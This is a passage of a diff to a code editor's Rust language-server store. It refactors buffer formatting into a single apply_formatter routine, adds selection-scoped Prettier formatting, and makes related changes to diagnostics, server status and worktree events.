deserialize_version, serialize_anchor, serialize_anchor_range, serialize_version, @@ -150,6 +149,8 @@ pub use language::Location; pub use lsp_store::inlay_hints::{CacheInlayHints, InvalidationStrategy}; #[cfg(any(test, feature = "test-support"))] pub use prettier::FORMAT_SUFFIX as TEST_PRETTIER_FORMAT_SUFFIX; +#[cfg(any(test, feature = "test-support"))] +pub use prettier::RANGE_FORMAT_SUFFIX as TEST_PRETTIER_RANGE_FORMAT_SUFFIX; pub use semantic_tokens::{ BufferSemanticToken, BufferSemanticTokens, RefreshForServer, SemanticTokenStylizer, TokenType, }; @@ -548,6 +549,7 @@ impl LocalLspStore { let mut initialization_options = Self::initialization_options_for_adapter( adapter.adapter.clone(), &delegate, + cx, ) .await?; @@ -822,15 +824,7 @@ impl LocalLspStore { let adapter = adapter.clone(); if let Some(this) = this.upgrade() { this.update(cx, |this, cx| { - { - let buffer = params - .uri 
- .to_file_path() - .map(|file_path| this.get_buffer(&file_path, cx)) - .ok() - .flatten(); - adapter.process_diagnostics(&mut params, server_id, buffer); - } + adapter.process_diagnostics(&mut params, server_id); this.merge_lsp_diagnostics( DiagnosticSourceKind::Pushed, @@ -843,9 +837,9 @@ impl LocalLspStore { ), registration_id: None, }], - |_, diagnostic, cx| match diagnostic.source_kind { + |_, diagnostic, _cx| match diagnostic.source_kind { DiagnosticSourceKind::Other | DiagnosticSourceKind::Pushed => { - adapter.retain_old_diagnostic(diagnostic, cx) + adapter.retain_old_diagnostic(diagnostic) } DiagnosticSourceKind::Pulled => true, }, @@ -1600,9 +1594,7 @@ impl LocalLspStore { .language_servers_for_buffer(buffer, cx) .map(|(adapter, lsp)| (adapter.clone(), lsp.clone())) .collect::>(); - let settings = - language_settings(buffer.language().map(|l| l.name()), buffer.file(), cx) - .into_owned(); + let settings = LanguageSettings::for_buffer(buffer, cx).into_owned(); let request_timeout = ProjectSettings::get_global(cx) .global_lsp_settings .get_request_timeout(); @@ -1610,28 +1602,6 @@ impl LocalLspStore { }) })?; - /// Apply edits to the buffer that will become part of the formatting transaction. - /// Fails if the buffer has been edited since the start of that transaction. - fn extend_formatting_transaction( - buffer: &FormattableBuffer, - formatting_transaction_id: text::TransactionId, - cx: &mut AsyncApp, - operation: impl FnOnce(&mut Buffer, &mut Context), - ) -> anyhow::Result<()> { - buffer.handle.update(cx, |buffer, cx| { - let last_transaction_id = buffer.peek_undo_stack().map(|t| t.transaction_id()); - if last_transaction_id != Some(formatting_transaction_id) { - anyhow::bail!("Buffer edited while formatting. 
Aborting") - } - buffer.start_transaction(); - operation(buffer, cx); - if let Some(transaction_id) = buffer.end_transaction(cx) { - buffer.merge_transactions(transaction_id, formatting_transaction_id); - } - Ok(()) - }) - } - // handle whitespace formatting if settings.remove_trailing_whitespace_on_save { zlog::trace!(logger => "removing trailing whitespace"); @@ -1701,503 +1671,585 @@ impl LocalLspStore { } else { formatter }; - match formatter { - Formatter::Auto => unreachable!("Auto resolved above"), - Formatter::Prettier => { - let logger = zlog::scoped!(logger => "prettier"); - zlog::trace!(logger => "formatting"); - let _timer = zlog::time!(logger => "Formatting buffer via prettier"); - - let prettier = lsp_store.read_with(cx, |lsp_store, _cx| { - lsp_store.prettier_store().unwrap().downgrade() - })?; - let diff = prettier_store::format_with_prettier(&prettier, &buffer.handle, cx) - .await - .transpose()?; - let Some(diff) = diff else { - zlog::trace!(logger => "No changes"); - continue; - }; + if let Err(err) = Self::apply_formatter( + formatter, + &lsp_store, + buffer, + formatting_transaction_id, + &adapters_and_servers, + &settings, + request_timeout, + logger, + cx, + ) + .await + { + zlog::error!(logger => "Formatter failed, skipping: {err:#}"); + } + } - extend_formatting_transaction( - buffer, - formatting_transaction_id, - cx, - |buffer, cx| { - buffer.apply_diff(diff, cx); - }, - )?; + Ok(()) + } + + async fn apply_formatter( + formatter: &Formatter, + lsp_store: &WeakEntity, + buffer: &FormattableBuffer, + formatting_transaction_id: clock::Lamport, + adapters_and_servers: &[(Arc, Arc)], + settings: &LanguageSettings, + request_timeout: Duration, + logger: zlog::Logger, + cx: &mut AsyncApp, + ) -> anyhow::Result<()> { + match formatter { + Formatter::None => { + zlog::trace!(logger => "skipping formatter 'none'"); + return Ok(()); + } + Formatter::Auto => { + debug_panic!("Auto resolved above"); + return Ok(()); + } + Formatter::Prettier => { + 
let logger = zlog::scoped!(logger => "prettier"); + zlog::trace!(logger => "formatting"); + let _timer = zlog::time!(logger => "Formatting buffer via prettier"); + + // When selection ranges are provided (via FormatSelections), we pass the + // encompassing UTF-16 range to Prettier so it can scope its formatting. + // After diffing, we filter the resulting edits to only keep those that + // overlap with the original byte-level selection ranges. + let (range_utf16, byte_ranges) = match buffer.ranges.as_ref() { + Some(ranges) if !ranges.is_empty() => { + let (utf16_range, byte_ranges) = + buffer.handle.read_with(cx, |buffer, _cx| { + let snapshot = buffer.snapshot(); + let mut min_start_utf16 = OffsetUtf16(usize::MAX); + let mut max_end_utf16 = OffsetUtf16(0); + let mut byte_ranges = Vec::with_capacity(ranges.len()); + for range in ranges { + let start_utf16 = range.start.to_offset_utf16(&snapshot); + let end_utf16 = range.end.to_offset_utf16(&snapshot); + min_start_utf16.0 = min_start_utf16.0.min(start_utf16.0); + max_end_utf16.0 = max_end_utf16.0.max(end_utf16.0); + + let start_byte = range.start.to_offset(&snapshot); + let end_byte = range.end.to_offset(&snapshot); + byte_ranges.push(start_byte..end_byte); + } + (min_start_utf16..max_end_utf16, byte_ranges) + }); + (Some(utf16_range), Some(byte_ranges)) + } + _ => (None, None), + }; + + let prettier = lsp_store.read_with(cx, |lsp_store, _cx| { + lsp_store.prettier_store().unwrap().downgrade() + })?; + let diff = prettier_store::format_with_prettier( + &prettier, + &buffer.handle, + range_utf16, + cx, + ) + .await + .transpose()?; + let Some(mut diff) = diff else { + zlog::trace!(logger => "No changes"); + return Ok(()); + }; + + if let Some(byte_ranges) = byte_ranges { + diff.edits.retain(|(edit_range, _)| { + byte_ranges.iter().any(|selection_range| { + edit_range.start < selection_range.end + && edit_range.end > selection_range.start + }) + }); + if diff.edits.is_empty() { + zlog::trace!(logger => "No changes 
within selection"); + return Ok(()); + } } - Formatter::External { command, arguments } => { - let logger = zlog::scoped!(logger => "command"); - zlog::trace!(logger => "formatting"); - let _timer = zlog::time!(logger => "Formatting buffer via external command"); - let diff = Self::format_via_external_command( - buffer, - &command, - arguments.as_deref(), + extend_formatting_transaction( + buffer, + formatting_transaction_id, + cx, + |buffer, cx| { + buffer.apply_diff(diff, cx); + }, + )?; + } + Formatter::External { command, arguments } => { + let logger = zlog::scoped!(logger => "command"); + + if buffer.ranges.is_some() { + zlog::debug!(logger => "External formatter does not support range formatting; skipping"); + return Ok(()); + } + + zlog::trace!(logger => "formatting"); + let _timer = zlog::time!(logger => "Formatting buffer via external command"); + + let diff = + Self::format_via_external_command(buffer, &command, arguments.as_deref(), cx) + .await + .with_context(|| { + format!("Failed to format buffer via external command: {}", command) + })?; + let Some(diff) = diff else { + zlog::trace!(logger => "No changes"); + return Ok(()); + }; + + extend_formatting_transaction( + buffer, + formatting_transaction_id, + cx, + |buffer, cx| { + buffer.apply_diff(diff, cx); + }, + )?; + } + Formatter::LanguageServer(specifier) => { + let logger = zlog::scoped!(logger => "language-server"); + zlog::trace!(logger => "formatting"); + let _timer = zlog::time!(logger => "Formatting buffer using language server"); + + let Some(buffer_path_abs) = buffer.abs_path.as_ref() else { + zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using language servers. 
Skipping"); + return Ok(()); + }; + + let language_server = match specifier { + settings::LanguageServerFormatterSpecifier::Specific { name } => { + adapters_and_servers.iter().find_map(|(adapter, server)| { + if adapter.name.0.as_ref() == name { + Some(server.clone()) + } else { + None + } + }) + } + settings::LanguageServerFormatterSpecifier::Current => adapters_and_servers + .iter() + .find(|(_, server)| Self::server_supports_formatting(server)) + .map(|(_, server)| server.clone()), + }; + + let Some(language_server) = language_server else { + log::debug!( + "No language server found to format buffer '{:?}'. Skipping", + buffer_path_abs.as_path().to_string_lossy() + ); + return Ok(()); + }; + + zlog::trace!( + logger => + "Formatting buffer '{:?}' using language server '{:?}'", + buffer_path_abs.as_path().to_string_lossy(), + language_server.name() + ); + + let edits = if let Some(ranges) = buffer.ranges.as_ref() { + zlog::trace!(logger => "formatting ranges"); + Self::format_ranges_via_lsp( + &lsp_store, + &buffer.handle, + ranges, + buffer_path_abs, + &language_server, + &settings, cx, ) .await - .with_context(|| { - format!("Failed to format buffer via external command: {}", command) - })?; - let Some(diff) = diff else { - zlog::trace!(logger => "No changes"); - continue; - }; - - extend_formatting_transaction( - buffer, - formatting_transaction_id, + .context("Failed to format ranges via language server")? + } else { + zlog::trace!(logger => "formatting full"); + Self::format_via_lsp( + &lsp_store, + &buffer.handle, + buffer_path_abs, + &language_server, + &settings, cx, - |buffer, cx| { - buffer.apply_diff(diff, cx); - }, - )?; + ) + .await + .context("failed to format via language server")? 
+ }; + + if edits.is_empty() { + zlog::trace!(logger => "No changes"); + return Ok(()); } - Formatter::LanguageServer(specifier) => { - let logger = zlog::scoped!(logger => "language-server"); - zlog::trace!(logger => "formatting"); - let _timer = zlog::time!(logger => "Formatting buffer using language server"); + extend_formatting_transaction( + buffer, + formatting_transaction_id, + cx, + |buffer, cx| { + buffer.edit(edits, None, cx); + }, + )?; + } + Formatter::CodeAction(code_action_name) => { + let logger = zlog::scoped!(logger => "code-actions"); + zlog::trace!(logger => "formatting"); + let _timer = zlog::time!(logger => "Formatting buffer using code actions"); - let Some(buffer_path_abs) = buffer.abs_path.as_ref() else { - zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using language servers. Skipping"); - continue; - }; + let Some(buffer_path_abs) = buffer.abs_path.as_ref() else { + zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using code actions. Skipping"); + return Ok(()); + }; - let language_server = match specifier { - settings::LanguageServerFormatterSpecifier::Specific { name } => { - adapters_and_servers.iter().find_map(|(adapter, server)| { - if adapter.name.0.as_ref() == name { - Some(server.clone()) - } else { - None - } - }) - } - settings::LanguageServerFormatterSpecifier::Current => { - adapters_and_servers.first().map(|e| e.1.clone()) - } - }; + let code_action_kind: CodeActionKind = code_action_name.clone().into(); + zlog::trace!(logger => "Attempting to resolve code actions {:?}", &code_action_kind); - let Some(language_server) = language_server else { - log::debug!( - "No language server found to format buffer '{:?}'. 
Skipping", - buffer_path_abs.as_path().to_string_lossy() + let mut actions_and_servers = Vec::new(); + + for (index, (_, language_server)) in adapters_and_servers.iter().enumerate() { + let actions_result = Self::get_server_code_actions_from_action_kinds( + &lsp_store, + language_server.server_id(), + vec![code_action_kind.clone()], + &buffer.handle, + cx, + ) + .await + .with_context(|| { + format!( + "Failed to resolve code action {:?} with language server {}", + code_action_kind, + language_server.name() + ) + }); + let Ok(actions) = actions_result else { + // note: it may be better to set result to the error and break formatters here + // but for now we try to execute the actions that we can resolve and skip the rest + zlog::error!( + logger => + "Failed to resolve code action {:?} with language server {}", + code_action_kind, + language_server.name() ); continue; }; + for action in actions { + actions_and_servers.push((action, index)); + } + } - zlog::trace!( - logger => - "Formatting buffer '{:?}' using language server '{:?}'", - buffer_path_abs.as_path().to_string_lossy(), - language_server.name() - ); + if actions_and_servers.is_empty() { + zlog::warn!(logger => "No code actions were resolved, continuing"); + return Ok(()); + } - let edits = if let Some(ranges) = buffer.ranges.as_ref() { - zlog::trace!(logger => "formatting ranges"); - Self::format_ranges_via_lsp( - &lsp_store, - &buffer.handle, - ranges, - buffer_path_abs, - &language_server, - &settings, - cx, - ) - .await - .context("Failed to format ranges via language server")? 
- } else { - zlog::trace!(logger => "formatting full"); - Self::format_via_lsp( - &lsp_store, - &buffer.handle, - buffer_path_abs, - &language_server, - &settings, - cx, + 'actions: for (mut action, server_index) in actions_and_servers { + let server = &adapters_and_servers[server_index].1; + + let describe_code_action = |action: &CodeAction| { + format!( + "code action '{}' with title \"{}\" on server {}", + action + .lsp_action + .action_kind() + .unwrap_or("unknown".into()) + .as_str(), + action.lsp_action.title(), + server.name(), ) - .await - .context("failed to format via language server")? }; - if edits.is_empty() { - zlog::trace!(logger => "No changes"); - continue; - } - extend_formatting_transaction( - buffer, - formatting_transaction_id, - cx, - |buffer, cx| { - buffer.edit(edits, None, cx); - }, - )?; - } - Formatter::CodeAction(code_action_name) => { - let logger = zlog::scoped!(logger => "code-actions"); - zlog::trace!(logger => "formatting"); - let _timer = zlog::time!(logger => "Formatting buffer using code actions"); + zlog::trace!(logger => "Executing {}", describe_code_action(&action)); - let Some(buffer_path_abs) = buffer.abs_path.as_ref() else { - zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using code actions. Skipping"); + if let Err(err) = + Self::try_resolve_code_action(server, &mut action, request_timeout).await + { + zlog::error!( + logger => + "Failed to resolve {}. 
Error: {}", + describe_code_action(&action), + err + ); continue; - }; - - let code_action_kind: CodeActionKind = code_action_name.clone().into(); - zlog::trace!(logger => "Attempting to resolve code actions {:?}", &code_action_kind); - - let mut actions_and_servers = Vec::new(); + } - for (index, (_, language_server)) in adapters_and_servers.iter().enumerate() { - let actions_result = Self::get_server_code_actions_from_action_kinds( - &lsp_store, - language_server.server_id(), - vec![code_action_kind.clone()], - &buffer.handle, - cx, - ) - .await - .with_context(|| { - format!( - "Failed to resolve code action {:?} with language server {}", - code_action_kind, - language_server.name() - ) - }); - let Ok(actions) = actions_result else { - // note: it may be better to set result to the error and break formatters here - // but for now we try to execute the actions that we can resolve and skip the rest - zlog::error!( + if let Some(edit) = action.lsp_action.edit().cloned() { + // NOTE: code below duplicated from `Self::deserialize_workspace_edit` + // but filters out and logs warnings for code actions that require unreasonably + // difficult handling on our part, such as: + // - applying edits that call commands + // which can result in arbitrary workspace edits being sent from the server that + // have no way of being tied back to the command that initiated them (i.e. we + // can't know which edits are part of the format request, or if the server is done sending + // actions in response to the command) + // - actions that create/delete/modify/rename files other than the one we are formatting + // as we then would need to handle such changes correctly in the local history as well + // as the remote history through the ProjectTransaction + // - actions with snippet edits, as these simply don't make sense in the context of a format request + // Supporting these actions is not impossible, but not supported as of yet. 
+ if edit.changes.is_none() && edit.document_changes.is_none() { + zlog::trace!( logger => - "Failed to resolve code action {:?} with language server {}", - code_action_kind, - language_server.name() + "No changes for code action. Skipping {}", + describe_code_action(&action), ); continue; - }; - for action in actions { - actions_and_servers.push((action, index)); } - } - if actions_and_servers.is_empty() { - zlog::warn!(logger => "No code actions were resolved, continuing"); - continue; - } - - 'actions: for (mut action, server_index) in actions_and_servers { - let server = &adapters_and_servers[server_index].1; - - let describe_code_action = |action: &CodeAction| { - format!( - "code action '{}' with title \"{}\" on server {}", - action - .lsp_action - .action_kind() - .unwrap_or("unknown".into()) - .as_str(), - action.lsp_action.title(), - server.name(), - ) - }; + let mut operations = Vec::new(); + if let Some(document_changes) = edit.document_changes { + match document_changes { + lsp::DocumentChanges::Edits(edits) => operations.extend( + edits.into_iter().map(lsp::DocumentChangeOperation::Edit), + ), + lsp::DocumentChanges::Operations(ops) => operations = ops, + } + } else if let Some(changes) = edit.changes { + operations.extend(changes.into_iter().map(|(uri, edits)| { + lsp::DocumentChangeOperation::Edit(lsp::TextDocumentEdit { + text_document: lsp::OptionalVersionedTextDocumentIdentifier { + uri, + version: None, + }, + edits: edits.into_iter().map(Edit::Plain).collect(), + }) + })); + } - zlog::trace!(logger => "Executing {}", describe_code_action(&action)); + let mut edits = Vec::with_capacity(operations.len()); - if let Err(err) = - Self::try_resolve_code_action(server, &mut action, request_timeout) - .await - { - zlog::error!( + if operations.is_empty() { + zlog::trace!( logger => - "Failed to resolve {}. Error: {}", + "No changes for code action. 
Skipping {}", describe_code_action(&action), - err ); continue; } - - if let Some(edit) = action.lsp_action.edit().cloned() { - // NOTE: code below duplicated from `Self::deserialize_workspace_edit` - // but filters out and logs warnings for code actions that require unreasonably - // difficult handling on our part, such as: - // - applying edits that call commands - // which can result in arbitrary workspace edits being sent from the server that - // have no way of being tied back to the command that initiated them (i.e. we - // can't know which edits are part of the format request, or if the server is done sending - // actions in response to the command) - // - actions that create/delete/modify/rename files other than the one we are formatting - // as we then would need to handle such changes correctly in the local history as well - // as the remote history through the ProjectTransaction - // - actions with snippet edits, as these simply don't make sense in the context of a format request - // Supporting these actions is not impossible, but not supported as of yet. - if edit.changes.is_none() && edit.document_changes.is_none() { - zlog::trace!( + for operation in operations { + let op = match operation { + lsp::DocumentChangeOperation::Edit(op) => op, + lsp::DocumentChangeOperation::Op(_) => { + zlog::warn!( + logger => + "Code actions which create, delete, or rename files are not supported on format. Skipping {}", + describe_code_action(&action), + ); + continue 'actions; + } + }; + let Ok(file_path) = op.text_document.uri.to_file_path() else { + zlog::warn!( logger => - "No changes for code action. Skipping {}", + "Failed to convert URI '{:?}' to file path. 
Skipping {}", + &op.text_document.uri, describe_code_action(&action), ); - continue; - } - - let mut operations = Vec::new(); - if let Some(document_changes) = edit.document_changes { - match document_changes { - lsp::DocumentChanges::Edits(edits) => operations.extend( - edits.into_iter().map(lsp::DocumentChangeOperation::Edit), - ), - lsp::DocumentChanges::Operations(ops) => operations = ops, - } - } else if let Some(changes) = edit.changes { - operations.extend(changes.into_iter().map(|(uri, edits)| { - lsp::DocumentChangeOperation::Edit(lsp::TextDocumentEdit { - text_document: - lsp::OptionalVersionedTextDocumentIdentifier { - uri, - version: None, - }, - edits: edits.into_iter().map(Edit::Plain).collect(), - }) - })); - } - - let mut edits = Vec::with_capacity(operations.len()); - - if operations.is_empty() { - zlog::trace!( + continue 'actions; + }; + if &file_path != buffer_path_abs { + zlog::warn!( logger => - "No changes for code action. Skipping {}", + "File path '{:?}' does not match buffer path '{:?}'. Skipping {}", + file_path, + buffer_path_abs, describe_code_action(&action), ); - continue; + continue 'actions; } - for operation in operations { - let op = match operation { - lsp::DocumentChangeOperation::Edit(op) => op, - lsp::DocumentChangeOperation::Op(_) => { + + let mut lsp_edits = Vec::new(); + for edit in op.edits { + match edit { + Edit::Plain(edit) => { + if !lsp_edits.contains(&edit) { + lsp_edits.push(edit); + } + } + Edit::Annotated(edit) => { + if !lsp_edits.contains(&edit.text_edit) { + lsp_edits.push(edit.text_edit); + } + } + Edit::Snippet(_) => { zlog::warn!( logger => - "Code actions which create, delete, or rename files are not supported on format. Skipping {}", + "Code actions which produce snippet edits are not supported during formatting. 
Skipping {}", describe_code_action(&action), ); continue 'actions; } - }; - let Ok(file_path) = op.text_document.uri.to_file_path() else { - zlog::warn!( - logger => - "Failed to convert URI '{:?}' to file path. Skipping {}", - &op.text_document.uri, - describe_code_action(&action), - ); - continue 'actions; - }; - if &file_path != buffer_path_abs { - zlog::warn!( - logger => - "File path '{:?}' does not match buffer path '{:?}'. Skipping {}", - file_path, - buffer_path_abs, - describe_code_action(&action), - ); - continue 'actions; - } - - let mut lsp_edits = Vec::new(); - for edit in op.edits { - match edit { - Edit::Plain(edit) => { - if !lsp_edits.contains(&edit) { - lsp_edits.push(edit); - } - } - Edit::Annotated(edit) => { - if !lsp_edits.contains(&edit.text_edit) { - lsp_edits.push(edit.text_edit); - } - } - Edit::Snippet(_) => { - zlog::warn!( - logger => - "Code actions which produce snippet edits are not supported during formatting. Skipping {}", - describe_code_action(&action), - ); - continue 'actions; - } - } } - let edits_result = lsp_store - .update(cx, |lsp_store, cx| { - lsp_store.as_local_mut().unwrap().edits_from_lsp( - &buffer.handle, - lsp_edits, - server.server_id(), - op.text_document.version, - cx, - ) - })? - .await; - let Ok(resolved_edits) = edits_result else { - zlog::warn!( - logger => - "Failed to resolve edits from LSP for buffer {:?} while handling {}", - buffer_path_abs.as_path(), - describe_code_action(&action), - ); - continue 'actions; - }; - edits.extend(resolved_edits); - } - - if edits.is_empty() { - zlog::warn!(logger => "No edits resolved from LSP"); - continue; } - - extend_formatting_transaction( - buffer, - formatting_transaction_id, - cx, - |buffer, cx| { - zlog::info!( - "Applying edits {edits:?}. Content: {:?}", - buffer.text() - ); - buffer.edit(edits, None, cx); - zlog::info!("Applied edits. 
New Content: {:?}", buffer.text()); - }, - )?; + let edits_result = lsp_store + .update(cx, |lsp_store, cx| { + lsp_store.as_local_mut().unwrap().edits_from_lsp( + &buffer.handle, + lsp_edits, + server.server_id(), + op.text_document.version, + cx, + ) + })? + .await; + let Ok(resolved_edits) = edits_result else { + zlog::warn!( + logger => + "Failed to resolve edits from LSP for buffer {:?} while handling {}", + buffer_path_abs.as_path(), + describe_code_action(&action), + ); + continue 'actions; + }; + edits.extend(resolved_edits); } - // bail early if command is invalid - let Some(command) = action.lsp_action.command() else { - continue; - }; - - zlog::warn!( - logger => - "Executing code action command '{}'. This may cause formatting to abort unnecessarily as well as splitting formatting into two entries in the undo history", - &command.command, - ); - - let server_capabilities = server.capabilities(); - let available_commands = server_capabilities - .execute_command_provider - .as_ref() - .map(|options| options.commands.as_slice()) - .unwrap_or_default(); - if !available_commands.contains(&command.command) { - zlog::warn!( - logger => - "Cannot execute a command {} not listed in the language server capabilities of server {}", - command.command, - server.name(), - ); + if edits.is_empty() { + zlog::warn!(logger => "No edits resolved from LSP"); continue; } - // noop so we just ensure buffer hasn't been edited since resolving code actions extend_formatting_transaction( buffer, formatting_transaction_id, cx, - |_, _| {}, + |buffer, cx| { + zlog::info!( + "Applying edits {edits:?}. Content: {:?}", + buffer.text() + ); + buffer.edit(edits, None, cx); + zlog::info!("Applied edits. 
New Content: {:?}", buffer.text()); + }, )?; - zlog::info!(logger => "Executing command {}", &command.command); + } - lsp_store.update(cx, |this, _| { - this.as_local_mut() - .unwrap() - .last_workspace_edits_by_language_server - .remove(&server.server_id()); - })?; + let Some(command) = action.lsp_action.command() else { + continue; + }; - let execute_command_result = server - .request::( - lsp::ExecuteCommandParams { - command: command.command.clone(), - arguments: command.arguments.clone().unwrap_or_default(), - ..Default::default() - }, - request_timeout, - ) - .await - .into_response(); + zlog::warn!( + logger => + "Executing code action command '{}'. This may cause formatting to abort unnecessarily as well as splitting formatting into two entries in the undo history", + &command.command, + ); - if execute_command_result.is_err() { - zlog::error!( - logger => - "Failed to execute command '{}' as part of {}", - &command.command, - describe_code_action(&action), - ); - continue 'actions; - } + let server_capabilities = server.capabilities(); + let available_commands = server_capabilities + .execute_command_provider + .as_ref() + .map(|options| options.commands.as_slice()) + .unwrap_or_default(); + if !available_commands.contains(&command.command) { + zlog::warn!( + logger => + "Cannot execute a command {} not listed in the language server capabilities of server {}", + command.command, + server.name(), + ); + continue; + } - let mut project_transaction_command = lsp_store.update(cx, |this, _| { - this.as_local_mut() - .unwrap() - .last_workspace_edits_by_language_server - .remove(&server.server_id()) - .unwrap_or_default() - })?; + extend_formatting_transaction( + buffer, + formatting_transaction_id, + cx, + |_, _| {}, + )?; + zlog::info!(logger => "Executing command {}", &command.command); - if let Some(transaction) = - project_transaction_command.0.remove(&buffer.handle) - { - zlog::trace!( - logger => - "Successfully captured {} edits that resulted from 
command {}", - transaction.edit_ids.len(), - &command.command, - ); - let transaction_id_project_transaction = transaction.id; - buffer.handle.update(cx, |buffer, _| { - // it may have been removed from history if push_to_history was - // false in deserialize_workspace_edit. If so push it so we - // can merge it with the format transaction - // and pop the combined transaction off the history stack - // later if push_to_history is false - if buffer.get_transaction(transaction.id).is_none() { - buffer.push_transaction(transaction, Instant::now()); - } - buffer.merge_transactions( - transaction_id_project_transaction, - formatting_transaction_id, - ); - }); - } + lsp_store.update(cx, |this, _| { + this.as_local_mut() + .unwrap() + .last_workspace_edits_by_language_server + .remove(&server.server_id()); + })?; - if project_transaction_command.0.is_empty() { - continue; - } + let execute_command_result = server + .request::( + lsp::ExecuteCommandParams { + command: command.command.clone(), + arguments: command.arguments.clone().unwrap_or_default(), + ..Default::default() + }, + request_timeout, + ) + .await + .into_response(); - let mut extra_buffers = String::new(); - for buffer in project_transaction_command.0.keys() { - buffer.read_with(cx, |b, cx| { - let Some(path) = b.project_path(cx) else { - return; - }; + if execute_command_result.is_err() { + zlog::error!( + logger => + "Failed to execute command '{}' as part of {}", + &command.command, + describe_code_action(&action), + ); + continue 'actions; + } - if !extra_buffers.is_empty() { - extra_buffers.push_str(", "); - } - extra_buffers.push_str(path.path.as_unix_str()); - }); - } - zlog::warn!( + let mut project_transaction_command = lsp_store.update(cx, |this, _| { + this.as_local_mut() + .unwrap() + .last_workspace_edits_by_language_server + .remove(&server.server_id()) + .unwrap_or_default() + })?; + + if let Some(transaction) = project_transaction_command.0.remove(&buffer.handle) + { + zlog::trace!( logger => 
- "Unexpected edits to buffers other than the buffer actively being formatted due to command {}. Impacted buffers: [{}].", + "Successfully captured {} edits that resulted from command {}", + transaction.edit_ids.len(), &command.command, - extra_buffers, ); - // NOTE: if this case is hit, the proper thing to do is to for each buffer, merge the extra transaction - // into the existing transaction in project_transaction if there is one, and if there isn't one in project_transaction, - // add it so it's included, and merge it into the format transaction when its created later + let transaction_id_project_transaction = transaction.id; + buffer.handle.update(cx, |buffer, _| { + // it may have been removed from history if push_to_history was + // false in deserialize_workspace_edit. If so push it so we + // can merge it with the format transaction + // and pop the combined transaction off the history stack + // later if push_to_history is false + if buffer.get_transaction(transaction.id).is_none() { + buffer.push_transaction(transaction, Instant::now()); + } + buffer.merge_transactions( + transaction_id_project_transaction, + formatting_transaction_id, + ); + }); + } + + if project_transaction_command.0.is_empty() { + continue; + } + + let mut extra_buffers = String::new(); + for buffer in project_transaction_command.0.keys() { + buffer.read_with(cx, |b, cx| { + let Some(path) = b.project_path(cx) else { + return; + }; + + if !extra_buffers.is_empty() { + extra_buffers.push_str(", "); + } + extra_buffers.push_str(path.path.as_unix_str()); + }); } + zlog::warn!( + logger => + "Unexpected edits to buffers other than the buffer actively being formatted due to command {}. 
Impacted buffers: [{}].", + &command.command, + extra_buffers, + ); + // NOTE: if this case is hit, the proper thing to do is to for each buffer, merge the extra transaction + // into the existing transaction in project_transaction if there is one, and if there isn't one in project_transaction, + // add it so it's included, and merge it into the format transaction when its created later } } } @@ -2284,6 +2336,14 @@ impl LocalLspStore { } } + fn server_supports_formatting(server: &Arc) -> bool { + let capabilities = server.capabilities(); + let formatting = capabilities.document_formatting_provider.as_ref(); + let range_formatting = capabilities.document_range_formatting_provider.as_ref(); + matches!(formatting, Some(p) if *p != OneOf::Left(false)) + || matches!(range_formatting, Some(p) if *p != OneOf::Left(false)) + } + async fn format_via_lsp( this: &WeakEntity, buffer: &Entity, @@ -3157,7 +3217,7 @@ impl LocalLspStore { .map(|edit| (range_from_lsp(edit.range), edit.new_text)) .collect::>(); - lsp_edits.sort_by_key(|(range, _)| (range.start, range.end)); + lsp_edits.sort_unstable_by_key(|(range, _)| (range.start, range.end)); let mut lsp_edits = lsp_edits.into_iter().peekable(); let mut edits = Vec::new(); @@ -3771,9 +3831,10 @@ impl LocalLspStore { async fn initialization_options_for_adapter( adapter: Arc, delegate: &Arc, + cx: &mut AsyncApp, ) -> Result> { let Some(mut initialization_config) = - adapter.clone().initialization_options(delegate).await? + adapter.clone().initialization_options(delegate, cx).await? 
else { return Ok(None); }; @@ -3903,6 +3964,7 @@ pub struct LspStore { pub lsp_server_capabilities: HashMap, semantic_token_config: SemanticTokenConfig, lsp_data: HashMap, + buffer_reload_tasks: HashMap>>, next_hint_id: Arc, } @@ -3952,10 +4014,7 @@ impl BufferLspData { self.inlay_hints.remove_server_data(for_server); if let Some(semantic_tokens) = &mut self.semantic_tokens { - semantic_tokens.raw_tokens.servers.remove(&for_server); - semantic_tokens - .latest_invalidation_requests - .remove(&for_server); + semantic_tokens.remove_server_data(for_server); } if let Some(folding_ranges) = &mut self.folding_ranges { @@ -4020,6 +4079,7 @@ pub enum LspStoreEvent { pub struct LanguageServerStatus { pub name: LanguageServerName, pub server_version: Option, + pub server_readable_version: Option, pub pending_work: BTreeMap, pub has_pending_diagnostic_updates: bool, pub progress_tokens: HashSet, @@ -4232,6 +4292,7 @@ impl LspStore { lsp_server_capabilities: HashMap::default(), semantic_token_config: SemanticTokenConfig::new(cx), lsp_data: HashMap::default(), + buffer_reload_tasks: HashMap::default(), next_hint_id: Arc::default(), active_entry: None, _maintain_workspace_config, @@ -4294,6 +4355,7 @@ impl LspStore { semantic_token_config: SemanticTokenConfig::new(cx), next_hint_id: Arc::default(), lsp_data: HashMap::default(), + buffer_reload_tasks: HashMap::default(), active_entry: None, _maintain_workspace_config, @@ -4351,7 +4413,9 @@ impl LspStore { this.update_local_worktree_language_servers(&worktree, changes, cx); } worktree::Event::UpdatedGitRepositories(_) - | worktree::Event::DeletedEntry(_) => {} + | worktree::Event::DeletedEntry(_) + | worktree::Event::Deleted + | worktree::Event::UpdatedRootRepoCommonDir => {} }) .detach() } @@ -4359,9 +4423,11 @@ impl LspStore { WorktreeStoreEvent::WorktreeUpdateSent(worktree) => { worktree.update(cx, |worktree, _cx| self.send_diagnostic_summaries(worktree)); } + WorktreeStoreEvent::WorktreeUpdatedEntries(worktree_id, changes) => 
